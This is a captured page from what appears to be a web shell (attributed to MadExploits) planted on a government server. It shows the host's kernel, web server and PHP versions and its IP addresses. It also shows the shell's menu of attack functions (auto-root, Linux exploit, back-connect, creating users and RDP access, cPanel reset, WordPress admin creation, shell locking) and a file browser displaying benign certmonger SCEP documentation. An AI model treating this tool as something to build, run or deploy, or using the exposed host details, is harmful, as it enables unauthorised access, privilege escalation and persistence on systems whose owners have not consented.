Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
certmonger-0.77.5 /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
71
B
-rw-r--r--
README
1.62
KB
-rw-r--r--
STATUS
7.35
KB
-rw-r--r--
api.txt
11.35
KB
-rw-r--r--
certmaster-submit.txt
817
B
-rw-r--r--
design.txt
23.52
KB
-rw-r--r--
dogtag-notes-2.txt
1.46
KB
-rw-r--r--
dogtag-notes.txt
15.28
KB
-rw-r--r--
fips.txt
549
B
-rw-r--r--
ftw.txt
5.82
KB
-rw-r--r--
getting-started.txt
9.41
KB
-rw-r--r--
gpl-3.0.txt
34.32
KB
-rw-r--r--
ipa-submit.txt
1.64
KB
-rw-r--r--
local-signer.txt
1.49
KB
-rw-r--r--
sbexample.txt
4.55
KB
-rw-r--r--
scep.txt
1.8
KB
-rw-r--r--
selinux.txt
4.44
KB
-rw-r--r--
submit.txt
7.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scep.txt
The addition of SCEP support brings with it a couple of new command-line options which are useful for SCEP. Non-SCEP use cases are not affected. Unlike IPA, certmaster, the local signer, or self-signing, there's no concept of a "default" SCEP server for the system, so certmonger doesn't provide a pre-canned configuration which attempts to use a default server. In order to be able to use certmonger with an SCEP server, then, a CA configuration needs to be added. While previously this could only be done either through the D-Bus API or by manually editing certmonger's data files, the "getcert" command now also provides both an "add-ca" command for the general case, and an "add-scep-ca" command, which "knows" both the location of certmonger's bundled SCEP helper and the options it recognizes, for the specific case. The results are the same regardless of which command is used. The general option looks like this: getcert add-ca -c exampleSCEPca -e \ "/usr/libexec/certmonger/scep-submit -u http://ca.example.com/cgi-bin/pkiclient.exe" The more specific option looks like this: getcert add-scep-ca -c exampleSCEPca -u http://ca.example.com/cgi-bin/pkiclient.exe If the URL of the server is an HTTPS URL, the -R option should be used to specify the location of the CA certificate, so that the server's HTTPS certificate can be verified. Once that's done, the CA will be listed by "getcert list-cas", and can be used to request a certificate, as per usual: getcert request -c exampleSCEPca -f /etc/pki/certfile -k /etc/pki/keyfile SCEP servers often expect an enrollment challenge password to be present in the enrollment request. The "getcert request" command now recognizes the -L and -l options for specifying such a value, or the name of a file that contains such a value, to include in the client's request.
Close
